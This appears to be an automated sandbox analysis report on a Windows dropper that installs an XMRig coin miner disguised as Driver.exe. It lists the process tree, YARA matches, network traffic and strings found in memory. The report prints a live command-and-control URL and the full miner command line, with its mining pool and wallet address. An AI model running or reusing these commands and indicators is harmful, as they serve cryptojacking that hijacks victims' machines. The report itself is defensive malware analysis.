                  Source: yondex.exe, 00000004.00000002.1885179373.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002711000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003357000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru
                  Source: yondex.exe, 00000004.00000002.1885179373.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002711000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru/cmd.php
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC072000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000692000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.drString found in binary or memory: https://cv99160.tw1.ru/cmd.php1pool.supportxmr.com:3333
                  Source: yondex.exe, 00000004.00000002.1885179373.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002711000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003116000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003061000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru/cmd.php?hwid=B81A4609
                  Source: yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru/cmd.php?hwid=B81A4609d
                  Source: yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru/cmd.php?hwid=B8dJ
                  Source: yondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru/cmd.php?hwid=B8dv
                  Source: yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru/cmd.php?tim
                  Source: yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003357000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000030C3000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003202000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru/cmd.php?timeout=1
                  Source: yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cv99160.tw1.ru/cmd.php?timeout=1d
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr, Driver.exe.4.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: Driver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                  Source: Driver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://xmrig.com/wizard
                  Source: Driver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://xmrig.com/wizard%s
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49755 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49834 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49837 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49878 version: TLS 1.2

                  System Summary

                  Source: 4.0.yondex.exe.690000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: Process Memory Space: Driver.exe PID: 7280, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65592C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65592C2F0
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe 8D6ABBA9B216172CFC64B8802DB0D20A1C634C96E1049F451EDDBA2363966BF0
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 7280 -ip 7280
                  Source: 4.0.yondex.exe.690000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner04 author = ditekSHen, description = Detects coinmining malware
                  Source: 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: Process Memory Space: Driver.exe PID: 7280, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner04 author = ditekSHen, description = Detects coinmining malware
                  Source: classification engineClassification label: mal100.troj.expl.evad.mine.winEXE@43/6@2/4
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65592B6D8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF65592B6D8
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655948624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF655948624
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeFile created: C:\Users\user\AppData\Roaming\Sysfiles
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2124:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeMutant created: NULL
                  Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:8052:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7400:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7808:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7384:120:WilError_03
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
                  Source: h2UFp4aCRq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeFile read: C:\Windows\win.ini
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: h2UFp4aCRq.exeReversingLabs: Detection: 39%
                  Source: h2UFp4aCRq.exeVirustotal: Detection: 56%
                  Source: Driver.exeString found in binary or memory: r_id; jit_vmcnt=(vmcnt<s_waitcnt_value)?vmcnt:-1; if(vmcnt<s_waitcnt_value) s_waitcnt_value=vmcnt; done=true; } p=jit_emit_instruction(p,last_branch_target,jit_inst,jit_prefetch_vgpr_index,jit_vmcnt,batch_size); if(p-start_p>size_limit) { *(p++)=S_SETPC_B64_S1
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeFile read: C:\Users\user\Desktop\h2UFp4aCRq.exe
                  Source: unknownProcess created: C:\Users\user\Desktop\h2UFp4aCRq.exe "C:\Users\user\Desktop\h2UFp4aCRq.exe"
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe rolex.exe -priverdD
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe"
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 7280 -ip 7280
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7280 -s 764
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe "C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe "C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe"
                  Source: unknown | Process created: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe "C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe"
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7440 -s 552
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 548 -p 7424 -ip 7424
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7424 -s 876
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 508 -p 1712 -ip 1712
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1712 -s 864
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe rolex.exe -priverdD
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe"
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 7280 -ip 7280
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7280 -s 764
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7440 -s 552
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 548 -p 7424 -ip 7424
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7424 -s 876
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 508 -p 1712 -ip 1712
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1712 -s 864
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exe | Section loaded: version.dll, dxgidebug.dll, sfc_os.dll, sspicli.dll, rsaenh.dll, uxtheme.dll, dwmapi.dll, cryptbase.dll, riched20.dll, usp10.dll, msls31.dll, kernel.appcore.dll, windowscodecs.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, windows.fileexplorer.common.dll, apphelp.dll, ntshrui.dll, cscapi.dll, linkinfo.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll, apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe | Section loaded: version.dll, dxgidebug.dll, sfc_os.dll, sspicli.dll, rsaenh.dll, uxtheme.dll, dwmapi.dll, cryptbase.dll, riched20.dll, usp10.dll, msls31.dll, kernel.appcore.dll, dpapi.dll, windowscodecs.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll, pcacli.dll, mpr.dll, windows.fileexplorer.common.dll, ntshrui.dll, cscapi.dll, msasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, sspicli.dll, windows.storage.dll, wldp.dll, uxtheme.dll, wbemcomn.dll, propsys.dll, amsi.dll, userenv.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, dnsapi.dll, winnsi.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: apphelp.dll, iphlpapi.dll, userenv.dll, cryptbase.dll, powrprof.dll, umpdc.dll, uxtheme.dll, mswsock.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
